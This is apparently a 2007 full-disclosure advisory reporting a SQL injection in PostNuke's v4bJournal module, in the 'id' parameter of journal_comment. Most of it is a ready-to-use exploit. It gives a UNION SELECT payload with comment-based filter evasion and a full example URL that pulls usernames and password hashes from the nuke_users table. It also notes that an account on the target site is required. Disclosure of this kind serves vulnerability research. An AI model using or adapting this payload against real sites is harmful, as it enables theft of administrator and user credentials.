Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[Full-disclosure] CMS Made Simple: SQL injection

Disable website access for sites running Webspeed

12All File Upload Vulnerability

Bradford CampusManager v3.1(6) Sensitive Data Disclosure

From:	abbasi_(at)_ustmb.ac.ir <abbasi_(at)_ustmb.ac.ir>
Date:	03.05.2007
Subject:	Post Nuke v4bJournal Module Sql Inject

----------------------------------------

PostNuke Journal

----------------------------------------

                                  

                   DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
      
  Greetz For All Y! UnderGround Group Members ( www.2600.ir )

   Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

        Contact:     abbasi@ustmb.ac.ir





                                  {SQL BUG}







in

   index.php?module=v4bJournal&func=journal_comment&id=(SQL)









------------------------------------------



        EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

Contact:   ABDUCTER_MINDS@YAHOO.COM







  index.php?module=v4bJournal&func=journal_comment&id=-
1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,
14/**/from/**/nuke_users/**/where/**/pn_uid=2/*



EX:-

http://www.example.com/index.php?module=v4bJournal&func=journal_comment&i
d=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,
14/**/from/**/nuke_users/**/where/**/pn_uid=2/*





U must regrister first ( You Most Have An Account On Vulnerable Site )

-------------------------------------------